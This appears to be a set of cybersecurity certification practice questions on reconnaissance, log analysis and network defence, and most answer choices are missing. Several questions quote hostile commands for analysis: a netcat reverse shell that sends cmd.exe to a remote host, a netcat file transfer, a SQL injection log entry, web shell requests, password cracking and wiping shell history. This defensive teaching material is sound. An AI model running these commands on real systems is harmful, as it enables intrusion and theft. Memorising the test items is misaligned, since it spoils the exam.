EXAM OBJECTIVES COVERED IN THIS CHAPTER:
1.1 Given a scenario, apply environmental reconnaissance techniques using appropriate tools and processes.
1.2 Given a scenario, analyze the results of a network reconnaissance.
1.3 Given a network-based threat, implement or recommend the appropriate response and countermeasure.
1.4 Explain the purpose of practices used to secure a corporate environment.
Charles wants to use active discovery techniques as part of his reconnaissance efforts. Which of the following techniques fits his criteria?
During the reconnaissance stage of a penetration test, Cynthia needs to gather information about the target organization’s network infrastructure without causing an IPS to alert the target to her information gathering. Which of the following is her best option?
Tiffany needs to assess the patch level of a Windows 2012 server and wants to use a freely available tool to check the system for security issues. Which of the following tools will provide the most detail about specific patches installed or missing from her machine?
Charleen is preparing to conduct a scheduled reconnaissance effort against a client site. Which of the following is not typically part of the rules of engagement that are agreed to with a client for a reconnaissance effort?
A port scan of a remote system shows that port 3306 is open on a remote database server. What database is the server most likely running?
Maria wants to deploy an anti-malware tool to detect zero-day malware. What type of detection method should she look for in her selected tool?
During a port scan of her network, Cynthia discovers a workstation that shows the following ports open. What should her next action be?
Charles wants to provide additional security for his web application that currently stores passwords in plain text in a database. Which of the following options is his best option to prevent theft of the database from resulting in exposed passwords?
Cameron needs to set up a Linux iptables-based firewall ruleset to prevent access from hosts A and B, while allowing SMTP traffic from host C. Which set of the following commands will accomplish this?
# iptables -I INPUT 2 -s 10.1.1.170 -j DROP
# iptables -I INPUT 2 -s 10.2.0.0/24 --dport 25 -j DROP
# iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j ALLOW
# iptables -I INPUT 2 -s 10.1.1.170 -j DROP
# iptables -I INPUT 2 -s 10.2.0.0.134 -j DROP
# iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j ALLOW
# iptables -I INPUT 2 -s 10.1.1.170 -j ALLOW
# iptables -I INPUT 2 -s 10.2.0.0.134 -j ALLOW
# iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j DROP
# iptables -I INPUT 2 -s 10.1.1.170 -j DROP
# iptables -I INPUT 2 -s 10.2.0.0.134 -j DROP
# iptables -I INPUT 2 -s 10.2.0.130 -j ALLOW
After filling out the scoping document for a penetration test, including details of what tools, techniques, and targets are included in the test, what is the next step that Jessica needs to take to conduct the test?
Brian’s penetration testing efforts have resulted in him successfully gaining access to a target system. Using the diagram shown here, identify what step occurs at point B in the NIST SP800-115 process flow.
Chris wants to prevent remote login attacks against the root account on a Linux system. What method will stop attacks like this while allowing normal users to use ssh?
What term is often used for attackers during a penetration test?
Charles uses the following command while investigating a Windows workstation used by his organization’s vice president of finance who only works during normal business hours. Charles believes that the workstation has been used without permission by members of his organization’s cleaning staff after-hours. What does he know if the user ID shown is the only user ID able to log into the system, and he is investigating on August 12, 2017?
C:Usersigfish>wmic netlogin get name,lastlogon,badpasswordcount
BadPasswordCount LastLogon Name
NT AUTHORITYSYSTEM 0 20170811203748.000000-240 Financeigfish
Lauren’s honeynet, shown here, is configured to use a segment of unused network space that has no legitimate servers in it. What type of threats is this design particularly useful for detecting?
Angela is designing her organization’s data center network and wants to establish a secure zone and a DMZ. If Angela wants to ensure that user accounts and traffic that manage systems in the DMZ are easily auditable and that all access can be logged while helping prevent negative impacts from compromised or infected workstations, which of the following solutions is Angela’s best design option?
Fred believes that the malware he is tracking uses a fast flux DNS network, which associates many IP addresses with a single fully qualified domain name as well as using multiple download hosts. How many distinct hosts should he review based on the netflow shown here?
Date flow start Duration Proto Src IP Addr:Port Dst IP Addr:Port Packets Bytes Flows
2017-07-11 14:39:30.606 0.448 TCP 192.168.2.1:1451->10.2.3.1:443 10 1510 1
2017-07-11 14:39:30.826 0.448 TCP 10.2.3.1:443->192.168.2.1:1451 7 360 1
2017-07-11 14:45:32.495 18.492 TCP 10.6.2.4:443->192.168.2.1:1496 5 1107 1
2017-07-11 14:45:32.255 18.888 TCP 192.168.2.1:1496->10.6.2.4:443 11 1840 1
2017-07-11 14:46:54.983 0.000 TCP 192.168.2.1:1496->10.6.2.4:443 1 49 1
2008-12-09 16:45:34.764 0.362 TCP 10.6.2.4:443->192.168.2.1:4292 4 1392 1
2008-12-09 16:45:37.516 0.676 TCP 192.168.2.1:4292->10.6.2.4:443 4 462 1
2008-12-09 16:46:38.028 0.000 TCP 192.168.2.1:4292->10.6.2.4:443 2 89 1
2017-07-11 14:45:23.811 0.454 TCP 192.168.2.1:1515->10.6.2.5:443 4 263 1
2017-07-11 14:45:28.879 1.638 TCP 192.168.2.1:1505->10.6.2.5:443 18 2932 1
2017-07-11 14:45:29.087 2.288 TCP 10.6.2.5:443->192.168.2.1:1505 37 48125 1
2017-07-11 14:45:54.027 0.224 TCP 10.6.2.5:443->192.168.2.1:1515 2 1256 1
2017-07-11 14:45:58.551 4.328 TCP 192.168.2.1:1525->10.6.2.5:443 10 648 1
2017-07-11 14:45:58.759 0.920 TCP 10.6.2.5:443->192.168.2.1:1525 12 15792 1
2017-07-11 14:46:32.227 14.796 TCP 192.168.2.1:1525->10.8.2.5:443 31 1700 1
2017-07-11 14:46:52.983 0.000 TCP 192.168.2.1:1505->10.8.2.5:443 1 40 1
Rick is auditing a Cisco router configuration and notes the following line:
login block-for 120 attempt 5 with 60
What type of setting has been enabled?
As a U.S. government employee, Michael is required to ensure that the network devices that he procures have a verified chain of custody for every chip and component that goes into them. What is this program known as?
During a network reconnaissance exercise, Chris gains access to a PC located in a secure network. If Chris wants to locate database and web servers that the company uses, what command-line tool can he use to gather information about other systems on the local network without installing additional tools or sending additional traffic?
Alice is conducting a penetration test of a client’s systems. As part of her test, she gathers information from the social media feeds of staff members who work for her client. What phase of the NIST penetration testing process is she currently in?
What is the default nmap scan type when nmap is not provided with a scan type flag?
Isaac wants to grab the banner from a remote web server using commonly available tools. Which of the following tools cannot be used to grab the banner from the remote host?
Charles wants to limit what potential attackers can gather during passive or semipassive reconnaissance activities. Which of the following actions will typically reduce his organization’s footprint the most?
Cassandra’s nmap scan of an open wireless network (192.168.10/24) shows the following host at IP address 192.168.1.1. Which of the following is most likely to be the type of system at that IP address based on the scan results shown?
While reviewing Shodan scan data for his organization, John notices the following entry. Which of the following is false?
Lauren has local access to a Windows workstation and wants to gather information about the organization that it belongs to. What type of information can she gain if she executes the command nbtstat -c?
Tracy believes that a historic version of her target’s website may contain data she needs for her reconnaissance. What tool can she use to review snapshots of the website from multiple points in time?
After Kristen received a copy of an nmap scan run by a penetration tester that her company hired, she knows that the tester used the -O flag. What type of information should she expect to see included in the output other than open ports?
Andrea wants to conduct a passive footprinting exercise against a target company. Which of the following techniques is not suited to a passive footprinting process?
While gathering reconnaissance data for a penetration test, Charleen uses the MxToolbox MX Lookup tool. What can she determine from the response to her query shown here?
Alex wants to scan a protected network and has gained access to a system that can communicate to both his scanning system and the internal network, as shown in the image here. What type of nmap scan should Alex conduct to leverage this host if he cannot install nmap on system A?
As a member of a blue team, John observed the following behavior during an external penetration test. What should he report to his managers at the conclusion of the test?
As part of an organization-wide red team exercise, Frank is able to use a known vulnerability to compromise an Apache web server. Once he has gained access, what should his next step be if he wants to use the system to pivot to protected systems behind the DMZ that the web server resides in?
As part of her malware analysis process, Caitlyn diagrams the high-level functions and processes that the malware uses to accomplish its goals. What is this process known as?
Alex has been asked to assess the likelihood of reconnaissance activities against her organization (a small, regional business). Her first assignment is to determine the likelihood of port scans against systems in her organization’s DMZ. How should she rate the likelihood of this occurring?
There is not enough information for Alex to provide a rating.
Use the following scenario for the questions 37 through 39.
Lucy is the SOC operator for her organization and is responsible for monitoring her organization’s SIEM and other security devices. Her organization has both domestic and international sites, and many of their employees travel frequently.
While Lucy is monitoring the SIEM, she notices that all of the log sources from her organization’s New York branch have stopped reporting for the past 24 hours. What type of detection rules or alerts should she configure to make sure she is aware of this sooner next time?
After her discovery in the first part of this question, Lucy is tasked with configuring alerts that are sent to system administrators. She builds a rule that can be represented in pseudocode as follows:
Send a SMS alert every 30 seconds when systems do not send logs for more than 1 minute.
The average administrator at Lucy’s organization is responsible for 150 to 300 machines.
What danger does Lucy’s alert create?
Lucy configures an alert that detects when users who do not typically travel log in from other countries. What type of analysis is this?
Behavior
During his analysis of a malware sample, John reviews the malware files and binaries without running them. What type of analysis is this?
The company that Lauren works for is making significant investments in infrastructure-as-a-service hosting to replace its traditional data center. Members of her organization’s management have expressed concerns about data remanence when Lauren’s team moves from one virtual host to another in their cloud service provider’s environment. What should she instruct her team to do to avoid this concern?
Lucca wants to prevent workstations on his network from attacking each other. If Lucca’s corporate network looks like the network shown here, what technology should he select to prevent laptop A from being able to attack workstation B?
Geoff wants to stop all traffic from reaching or leaving a Linux system with an iptables firewall. Which of the following commands is not one of the three iptables commands needed to perform this action?
The company that Dan works for has recently migrated to a SaaS provider for its enterprise resource planning (ERP) software. In its traditional on-site ERP environment, Dan conducted regular port scans to help with security validation for the systems. What will Dan most likely have to do in this new environment?
Charles uses Network Miner to review packet captures from his reconnaissance of a target organization. One system displayed the information shown here. What information has Network Miner used to determine that the PC is a Hewlett-Packard device?
Laura’s organization has been receiving a large amount of spam email sent specifically to the email addresses listed in her organization’s domain registrations. Which of the following techniques will help her organization limit this type of spam?
Eric believes that his organization has a number of vulnerable systems that have been scanned by third parties. If he wants to check publicly available vulnerability information, which of the following methods are best suited to performing this type of passive reconnaissance?
Adam knows that netcat is a useful penetration testing tool. Which of the following is not a way that he can use netcat, if he is using it as his only tool?
Which of the following tools can be used to passively gather the information required to generate a network topology map?
Lauren wants to use an advanced Google query to search for information that is not readily available as part of her reconnaissance efforts. What term is commonly used to describe these searches?
What type of control review will focus on change management as a major element in its assessment scope?
As part of her reconnaissance process for her organization’s internal security review, Olivia uses Shodan to search for hosts within her target’s IP range. She discovers the following Shodan entry listing for one of her target’s devices. What should she do with this information?
Kathleen wants to verify on a regular basis that a file has not changed on the system that she is responsible for. Which of the following methods is best suited to this?
Selah has been tasked with gathering information to increase her penetration testing team’s understanding of their customer’s Internet footprint. She wants to gather details of emails, subdomains, employee names, and other information in an automated way. Which of the following tools is best suited to her needs?
While reviewing the Wireshark packet capture shown here, Ryan notes an extended session using the ESP protocol. When he clicks the packets, he is unable to make sense of the content. What should Ryan look for on the workstation with IP address 10.0.0.1 if he investigates it in person?
Ben wants to quickly check a suspect binary file for signs of its purpose or other information that it may contain. What Linux tool can quickly show him potentially useful information contained in the file?
While investigating a malware infection, Lauren discovers that the hosts file for the system she is reviewing contains multiple entries, as shown here:
0.0.0.0 symantec.com
0.0.0.0 mcafee.com
0.0.0.0 microsoft.com
0.0.0.0 kapersky.com
Why would the malware make this change?
Alice believes that one of her users may be taking malicious action on the systems she has access to. When she walks past her user’s desktop, she sees the following command on the screen:
user12@workstation:/home/user12# ./john -wordfile:/home/user12/mylist.txt -format:lm hash.txt
What is the user attempting to do?
nmap provides a standardized way to name hardware and software that it detects. What is this called?
Charles wants to detect port scans using syslog so that he can collect and report on the information using his SIEM. If he is using a default CentOS system, what should he do?
Alex wants to list all of the NetBIOS sessions open on a workstation. What command should he issue to do this?
Lucas believes that an attacker has successfully compromised his web server. Using the following output of ps, identify the process ID he should focus on.
root 507 0.0 0.1 258268 3288 ? Ssl 15:52 0:00 /usr/sbin/rsyslogd -n
message+ 508 0.0 0.2 44176 5160 ? Ss 15:52 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activa
root 523 0.0 0.3 281092 6312 ? Ssl 15:52 0:00 /usr/lib/accountsservice/accounts-daemon
root 524 0.0 0.7 389760 15956 ? Ssl 15:52 0:00 /usr/sbin/NetworkManager --no-daemon
root 527 0.0 0.1 28432 2992 ? Ss 15:52 0:00 /lib/systemd/systemd-logind
apache 714 0.0 0.1 27416 2748 ? Ss 15:52 0:00 /www/temp/webmin
root 617 0.0 0.1 19312 2056 ? Ss 15:52 0:00 /usr/sbin/irqbalance --pid=/var/run/irqbalance.pid
root 644 0.0 0.1 245472 2444 ? Sl 15:52 0:01 /usr/sbin/VBoxService
root 653 0.0 0.0 12828 1848 tty1 Ss+ 15:52 0:00 /sbin/agetty --noclear tty1 linux
root 661 0.0 0.3 285428 8088 ? Ssl 15:52 0:00 /usr/lib/policykit-1/polkitd --no-debug
root 663 0.0 0.3 364752 7600 ? Ssl 15:52 0:00 /usr/sbin/gdm3
root 846 0.0 0.5 285816 10884 ? Ssl 15:53 0:00 /usr/lib/upower/upowerd
root 867 0.0 0.3 235180 7272 ? Sl 15:53 0:00 gdm-session-worker [pam/gdm-launch-environment]
Debian-+ 877 0.0 0.2 46892 4816 ? Ss 15:53 0:00 /lib/systemd/systemd --user
Debian-+ 878 0.0 0.0 62672 1596 ? S 15:53 0:00 (sd-pam)
While reviewing the filesystem of a potentially compromised system, Angela sees the following output when running ls -la. What should her next action be after seeing this?
Michelle has been experiencing SYN floods and deploys a mitigation technique that allows the server to respond as if SYNs were accepted but then delete the SYN entry in its queue. If the client then responds with a SYN-ACK, the server reconstructs the SYN entry and continues the connection. What technique is Michelle using?
What two phases of the NIST penetration testing cycle are often repeated during a test?
Geoff is responsible for hardening systems on his network and discovers that a number of network appliances have exposed services including telnet, FTP, and web servers. What is his best option to secure these systems?
Lauren is performing passive intelligence gathering and discovers a directory filled with photos taken by her target organization’s staff. If she wants to review the metadata from the photos, what tool can she use to do so?
Lauren’s network firewall denies all inbound traffic but allows all outbound traffic. While investigating a Windows workstation, she encounters a script that runs the following command:
at \workstation10 20:30 every:F nc -nv 10.1.2.3 443 -e cmd.exe
What does it do?
While conducting reconnaissance of his own organization, Chris discovers that multiple certificates are self-signed. What issue should he report to his management?
Isaac has access to a Windows system that is a member of the local Active Directory domain as part of his white-box penetration test. Which of the following commands might provide information about other systems on the network?
During the reconnaissance stage of a penetration test, Fred calls a number of staff at the target organization. Using a script he prepared, Fred introduces himself as part of the support team for their recently installed software and asks for information about the software and its configuration. What is this technique called?
Geoff needs to lock down a Windows workstation that has recently been scanned using nmap with the results shown here. He knows that the workstation needs to access websites and that the system is part of a Windows domain. What ports should he allow through the system’s firewall for externally initiated connections?
Lucca wants to identify systems that may have been compromised and are being used for data exfiltration. Which of the following technologies should he put into place to capture data that he can analyze using his SIEM to find this behavior?
During a white-box penetration test, Luke finds that he is suddenly unable to connect to the target network. What has likely happened?
Adam’s port scan returns results on six TCP ports: 22, 80, 443, 515, 631, and 9100. If Adam needs to guess what type of device this is based on these ports, what is his best guess?
Cassandra believes that attackers were able to extract a volume shadow copy of a workstation belonging to her organization’s Windows domain administrator. What information should she not report as being potentially exposed?
Lauren is contacted by a concerned administrator who notes that almost all of their Windows 10 Enterprise workstations are reporting the following issue after a patch deployment. What important policy may be missing?
Jarett needs to protect an application server against resource exhaustion attacks. Which of the following techniques is best suited to surviving a large-scale DDoS attack?
In his role as the SOC operator, Frank regularly scans a variety of servers in his organization. After two months of reporting multiple vulnerabilities on a Windows file server, Frank recently escalated the issue to the server administrator’s manager.
At the next weekly scan window, Frank noticed that all of the vulnerabilities were no longer active; however, ports 137, 139, and 445 were still showing as open. What most likely happened?
While conducting reconnaissance, Greg discovers what he believes is an SMTP service running on an alternate port. What technique should he use to manually validate his guess?
Adam is reviewing his organization’s security footprint by conducting reconnaissance activities. After reviewing a list of Google dorks, he runs the following search:
"mysqli_connect" ext:inc
If it returns data, what should he recommend in his report to management?
Rick’s manager wants to present the most trustworthy certificate possible for a website. What type of certificate should Rick get?
While reviewing web server logs, Danielle notices the following entry. What occurred?
10.11.210.6 - GET /wordpress/wp-admin/theme-editor.php?file=404.php&theme= total 200
While reviewing his Apache logs, Charles discovers the following entry. What has occurred?
10.1.1.1 - - [27/Jun/2017:11:42:22 -0500] "GET
/query.php?searchterm=stuff&%20lid=1%20UNION%20SELECT%200,username,user_id,password,
name,%20email,%20FROM%20users HTTP/1.1" 200 9918 "-" "Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
What two pieces of information does nmap need to estimate network path distance?
Charles needs to make sure he has found the correct social media profile for a target of his OSINT process. Which of the following includes the three critical items needed to uniquely identify the majority of Americans?
While reviewing logs from users with root privileges on an administrative jump box, Alex discovers the following suspicious command:
nc -l -p 43501 < example.zip
What happened?
During an on-site penetration test of a small business, Bob scans outward to a known host to determine the outbound network topology. What information can he gather from the results provided by Zenmap?
Chris discovers the following entries in /var/log/auth.log. What is most likely occurring?
Aug 6 14:13:00 demo sshd[5279]: Failed password for root from 10.11.34.11 port 38460 ssh2
Aug 6 14:13:00 demo sshd[5275]: Failed password for root from 10.11.34.11 port 38452 ssh2
Aug 6 14:13:00 demo sshd[5284]: Failed password for root from 10.11.34.11 port 38474 ssh2
Aug 6 14:13:00 demo sshd[5272]: Failed password for root from 10.11.34.11 port 38446 ssh2
Aug 6 14:13:00 demo sshd[5276]: Failed password for root from 10.11.34.11 port 38454 ssh2
Aug 6 14:13:00 demo sshd[5273]: Failed password for root from 10.11.34.11 port 38448 ssh2
Aug 6 14:13:00 demo sshd[5271]: Failed password for root from 10.11.34.11 port 38444 ssh2
Aug 6 14:13:00 demo sshd[5280]: Failed password for root from 10.11.34.11 port 38463 ssh2
Aug 6 14:13:01 demo sshd[5302]: Failed password for root from 10.11.34.11 port 38478 ssh2
Aug 6 14:13:01 demo sshd[5301]: Failed password for root from 10.11.34.11 port 38476 ssh2
As part of his reconnaissance effort, Charles uses the following Google search string:
"authentication failure; logname=" ext:log;site:example.com
What will he find if he receives results from his target’s domain?
While reviewing email logs for his domain’s email server, Rick notices that a single remote host is sending email to usernames that appear to be in alphabetical order:
...
This behavior continues for thousands of entries, resulting in many bounced email messages, but some make it through. What type of reconnaissance has Rick encountered?
Which of the following capabilities is not a typical part of an SIEM system?
What major issue would Charles face if he relied on hashing malware packages to identify malware packages?
Hashing relies on unencrypted malware samples.
Use the following network diagram and scenario to answer the next three questions:
Lauren is a security analyst who has been tasked with performing nmap scans of her organization’s network. She is a new hire and has been given this logical diagram of the organization’s network but has not been provided with any additional detail.
Lauren wants to determine what IP addresses to scan from location A. How can she find this information?
If Lauren runs a scan from location B that targets the servers on the data center network and then runs a scan from location C, what differences is she most likely to see between the scans?
Lauren wants to perform regular scans of the entire organizational network but only has a budget that supports buying hardware for a single scanner. Where should she place her scanner to have the most visibility and impact?
Andrea needs to add a firewall rule that will prevent external attackers from conducting topology gathering reconnaissance on her network. Where should she add a rule intended to block this type of traffic?
Alex has been asked to investigate a call to one of his organization’s system administrators that is believed to have led to a breach. The administrator described that call by saying that the caller identified themselves as the assistant to the director of sales and said that they needed access to a file that was critical to a sales presentation with a major client but that their laptop had died. The administrator provided a link to the file, which included the organization’s sales data for the quarter. What type of social engineering occurred?
Which of the three key objectives of cybersecurity is often ensured by using techniques like hashing and the use of tools like Tripwire?
The netflow collector that Sam’s security team uses is capable of handling 1 gigabit of traffic per second. As Sam’s organization has grown, it has increased its external network connection to a 2 gigabit per second external link and has begun to approach full utilization at various times during the day. If Sam’s team does not have new budget money to purchase a more capable collector, what option can Sam use to still collect useful data?
Senior C-level executives at the organization that Alex works for have received targeted phishing messages that include a fake organizational login page link and a message that states that their passwords were inadvertently reset during a scheduled maintenance window. What type of attack should Alex describe in his after action report?
Brandon wants to perform a WHOIS query for a system he believes is located in Europe. Which NIC should he select to have the greatest likelihood of success for his query?
Chris wants to determine what TCP ports are listening on a Windows system. What is his best option to determine this from the command line?
As part of her system hardening process for a Windows 10 workstation, Lauren runs the Microsoft Baseline System Analyzer. She sees the following result after MBSA runs. What can she determine from this scan?
While Greg was performing a port scan of a critical server system, the system administrators at his company observed the behavior shown here in their network management software suite. What action should Greg take after he is shown this chart?
An access control system that relies on the operating system to constrain the ability of a subject to perform operations is an example of what type of access control system?
While reviewing Apache logs, Janet sees the following entries as well as hundreds of others from the same source IP. What should Janet report has occurred?
[ 21/Jul/2017:02:18:33 -0500] - - 10.0.1.1 "GET /scripts/sample.php" "-" 302 336 0
[ 21/Jul/2017:02:18:35 -0500] - - 10.0.1.1 "GET /scripts/test.php" "-" 302 336 0
[ 21/Jul/2017:02:18:37 -0500] - - 10.0.1.1 "GET /scripts/manage.php" "-" 302 336 0
[ 21/Jul/2017:02:18:38 -0500] - - 10.0.1.1 "GET /scripts/download.php" "-" 302 336 0
[ 21/Jul/2017:02:18:40 -0500] - - 10.0.1.1 "GET /scripts/update.php" "-" 302 336 0
[ 21/Jul/2017:02:18:42 -0500] - - 10.0.1.1 "GET /scripts/new.php" "-" 302 336 0
Charles received a pcap file from a system administrator at a remote site who was concerned about the traffic it showed. What type of behavior should Charles report after his analysis of the file?
Susan is reviewing files on a Windows workstation and believes that cmd.exe has been replaced with a malware package. Which of the following is the best way to validate her theory?
What U.S. government program seeks to provide trusted sources that meet the following requirements?
While reviewing netflows for a system on her network, Alice discovers the following traffic pattern. What is occurring?
Date flow start Duration Proto Src IP Addr:Port->Dst IP Addr:Port Packets Bytes Flows
2017-07-11 04:59:32.934 0.000 TCP 10.1.1.1:34543->10.2.2.6:22 1 60 1
2017-07-11 04:59:39.730 0.000 TCP 10.1.1.1:34544->10.2.2.7:22 1 60 1
2017-07-11 04:59:46.166 0.000 TCP 10.1.1.1:34545->10.2.2.8:22 1 60 1
2017-07-11 04:59:52.934 0.000 TCP 10.1.1.1:34546->10.2.2.9:22 1 60 1
2017-07-11 05:00:06.710 0.000 TCP 10.1.1.1:34547->10.2.2.10:22 1 60 1
2017-07-11 05:00:46.160 0.000 TCP 10.1.1.1:34548->10.2.2.11:22 1 60 1
2017-07-11 05:01:32.834 0.000 TCP 10.1.1.1:34549->10.2.2.12:22 1 60 1
2017-07-11 05:01:39.430 0.000 TCP 10.1.1.1:34550->10.2.2.13:22 1 60 1
2017-07-11 05:01:46.676 0.000 TCP 10.1.1.1:34551->10.2.2.14:22 1 60 1
Chris wants to gather as much information as he can about an organization using DNS harvesting techniques. Which of the following methods will most easily provide the most useful information if they are all possible to conduct on the network he is targeting?
The national insurance company that Luke works for has experienced a breach, and Luke is attempting to categorize the impact. As he reviews the incident report, he notes that customer data that included Social Security numbers was exfiltrated from the organization. How should he categorize the impact?
As part of his reconnaissance effort, Chris enters usernames from public information about a company into a site like checkusernames.com and receives information like the results shown here. What type of action is he performing?
Geoff wants to perform passive reconnaissance as part of an evaluation of his organization’s security controls. Which of the following techniques is a valid technique to perform as part of a passive DNS assessment?
Mike’s penetration test requires him to use passive mapping techniques to discover network topology. Which of the following tools is best suited to that task?
Geoff has been asked to identify a technical solution that will reduce the risk of captured or stolen passwords being used to allow access to his organization’s systems. Which of the following technologies should he recommend?
While gathering DNS information about an organization, Chris discovered multiple AAAA records. What type of reconnaissance does this mean Chris may want to consider?
Sharon wants to gather email addresses as part of her reconnaissance efforts. Which of the following tools best suits her needs?
TheHarvester
After Charles completes a topology discovery scan of his local network, he sees the Zenmap topology shown here. What can Charles determine from the Zenmap topology view?
Which of the following items is not one of the three important rules that should be established before a penetration test?
Scott is part of the white team who is overseeing his organization’s internal red and blue teams during an exercise that requires each team to only perform actions appropriate to the penetration test phase they are in. During the reconnaissance phase, he notes the following behavior as part of a Wireshark capture. What should he report?
Jennifer analyzes a Wireshark packet capture from a network that she is unfamiliar with. She discovers that a host with IP address 10.11.140.13 is running services on TCP ports 636 and 443. What services is that system most likely running?
Lauren inputs the following command on a Linux system:
#echo 127.0.0.1 example.com >> /etc/hosts
What has she done?
While reviewing Apache logs, Cynthia notices the following log entries. What has occurred?
10.0.1.1 - POST /wordpress/wp-content/r57.php?1 200
10.0.1.1 - GET /wordpress/wp-content/r57.php 200
Rhonda has identified a privilege escalation flaw on the system she targeted in the first phase of her penetration test and is now ready to take the next step. According to the NIST 800-115 standard, what is step C that Rhonda needs to take, as shown in this diagram?
While conducting a penetration test, Ben executes the following command:
ifconfig eth0 hw ether 08:00:27:06:d4
What network protection is Ben most likely attempting to avoid?
When Scott performs an nmap scan with the -T flag set to 5, what variable is he changing?
While conducting a port scan of a remote system, Henry discovers TCP port 1433 open. What service can he typically expect to run on this port?
Every year, Alice downloads and reads a security industry published list of all the types of attacks, compromises, and malware events that have occurred, that are becoming more prevalent, and that are decreasing in occurrence. What type of analysis can she perform using this information?
While application vulnerability scanning one of her target organizations web servers, Andrea notices that the server’s hostname is resolving to a cloudflare.com host. What does Andrea know about her scan?
While conducting active reconnaissance, Lauren discovers a web remote management application that appears to allow Windows command-line access on a server. What command can she run to quickly determine what user the service is running as?
While tracking a potential APT on her network, Cynthia discovers a network flow for her company’s central file server. What does this flow entry most likely show if 10.2.2.3 is not a system on her network?
Date flow start Duration Proto Src IP Addr:Port Dst IP Addr:Port Packets Bytes Flows
2017-07-11 13:06:46.343 21601804 TCP 10.1.1.1:1151->10.2.2.3:443 9473640 9.1 G 1
2017-07-11 13:06:46.551 21601804 TCP 10.2.2.3:443->10.1.1.1:1151 8345101 514 M 1
Chris wants to prevent users from running a popular game on Windows workstations he is responsible for. How can Chris accomplish this for Windows 10 Pro workstations?
After a series of compromised accounts led to her domain being blacklisted, Lauren has been asked to restore her company’s email as quickly as possible. Which of the following options is not a valid way to allow her company to send email successfully?
Part of Tracy’s penetration testing assignment is to evaluate the WPA2 Enterprise protected wireless networks of her target organization. What major differences exist between reconnaissance of a wired network versus a wireless network?
Ian’s company has an internal policy requiring that they perform regular port scans of all of their servers. Ian has been part of a recent effort to move his organization’s servers to an infrastructure as a service provider. What change will Ian most likely need to make to his scanning efforts?
During a regularly scheduled PCI compliance scan, Fred has discovered port 3389 open on one of the point-of-sale terminals that he is responsible for managing. What service should he expect to find enabled on the system?
Cynthia knows that the organization she is scanning runs services on alternate ports to attempt to reduce scans of default ports. As part of her intelligence-gathering process, she discovers services running on ports 8080 and 8443. What services are most likely running on these ports?
Lauren wants to identify all the printers on the subnets she is scanning with nmap. Which of the following nmap commands will not provide her with a list of likely printers?
Chris knows that systems have connected to a remote host on TCP ports 1433 and 1434. If he has no other data, what should his best guess be about what the host is?
What services will the following nmap scan test for?
nmap -sV -p 22,25,53,389 192.168.2.50/27
While investigating a compromise, Glenn encounters evidence that a user account has been added to the system he is reviewing. He runs a diff of /etc/shadow and /etc/passwd and sees the following output. What has occurred?
> root:$6$XHxtN5iB$5WOyg3gGfzr9QHPLo.7z0XIQIzEW6Q3/K7iipxG7ue04CmelkjC51SndpOcQlxTHmW4/AKKsKew4f3cb/.BK8/:16828:0:99999:7:::
> daemon:*:16820:0:99999:7:::
> bin:*:16820:0:99999:7:::
> sys:*:16820:0:99999:7:::
> sync:*:16820:0:99999:7:::
> games:*:16820:0:99999:7:::
> man:*:16820:0:99999:7:::
> lp:*:16820:0:99999:7:::
> mail:*:16820:0:99999:7:::
> news:*:16820:0:99999:7:::
> uucp:*:16820:0:99999:7:::
> proxy:*:16820:0:99999:7:::
> www-data:*:16820:0:99999:7:::
> backup:*:16820:0:99999:7:::
> list:*:16820:0:99999:7:::
> irc:*:16820:0:99999:7:::
While conducting a topology scan of a remote web server, Susan notes that the IP addresses returned for the same DNS entry change over time. What has she likely encountered?
Attackers have been attempting to log into Alaina’s Cisco routers, causing thousands of log entries, and she is worried they may eventually succeed. Which of the following options should she recommend to resolve this issue?
Ron is reviewing his team’s work as part of a reconnaissance effort and is checking Wireshark packet captures. His team reported no open ports on 10.0.2.15. What issue should he identify with their scan based on the capture shown here?
John needs to protect his organization’s authentication system against brute-force attacks. Which of the following control pairs are best suited to preventing a brute-force attack from succeeding if ease of use and maintenance is also important?
While reviewing the command history for an administrative user, Chris discovers a suspicious command that was captured, shown here:
ln /dev/null ~/.bash_history
What action was this user attempting to perform?
While attempting to stop a rogue service, Monica issues the following Linux command on an Ubuntu system using upstart:
service rogueservice stop
After a reboot, she discovers the service running again. What happened, and what does she need to do to prevent this?
Lucca wants to validate DNS responses to ensure that they are from authoritative DNS servers. What technology can he use to do this?
Nathan has been asked to monitor and manage the environment in which a cybersecurity exercise is conducted. What team is he on?
Allan’s nmap scan includes a line that starts with cpe:/o. What type of information should he expect to gather from the entry?
Which of the following items is not typically included in the rules of engagement for a penetration test?
Isaac wants to prevent hosts from connecting to known malware distribution domains. What type of solution can he use to do this without deploying endpoint protection software or an IPS?
While scanning a network, Frank discovers a host running a service on TCP ports 1812 and 1813. What type of server has Frank most likely discovered?
While reviewing output from netstat, John sees the following output. What should his next action be?
[minesweeper.exe]
TCP 127.0.0.1:62522 dynamo:0 LISTENING
[minesweeper.exe]
TCP 192.168.1.100 151.101.2.69:https ESTABLISHED
Shane wants to conduct an nmap scan of a firewalled subnet. Which of the following is not an nmap firewall evasion technique he could use?
Alex is observing a penetration tester who has gained access to a Windows domain controller. The penetration tester runs a program called fgdump and gathers information from the system. What type of information has the penetration tester targeted?
Which of the following commands will provide Ben with the most information about a host?
Selah suspects that the Linux system she has just logged into may be Trojaned and wants to check where the bash shell she is running is being executed from. What command should she run to determine this?
Adam needs to provide ssh access to systems behind his data center firewall. If Adam’s organization uses the system architecture shown here, what is the system at point A called?
Angela wants to block traffic sent to a suspected malicious host. What iptables rule entry can she use to block traffic to a host with IP address 10.24.31.11?
Fred’s reconnaissance of an organization includes a search of the Censys network search engine. There, he discovers multiple certificates with validity dates as shown here:
Validity
2016-07-07 00:00:00to 2017-08-11 23:59:59 (400 days, 23:59:59)
2016-07-08 00:00:00to 2017-08-12 23:59:59 (400 days, 23:59:59)
2017-07-11 00:00:00to 2018-08-15 23:59:59 (400 days, 23:59:59)
What should Fred record in his reconnaissance notes?
After receiving a penetration test report, Rick has decided to implement anti-harvesting techniques for his organization’s DNS. Which of the following sets of techniques is best suited to preventing bulk and automated information gathering?
When Casey scanned a network host, she received the results shown here. What does she know based on the scan results?
What is a document that lists sensitive data-handling rules, contact information, black-box testing, and status meeting schedules called during a penetration test?
Fred conducts an SNMP sweep of a target organization and receives no-response replies from multiple addresses that he believes belong to active hosts. What does this mean?
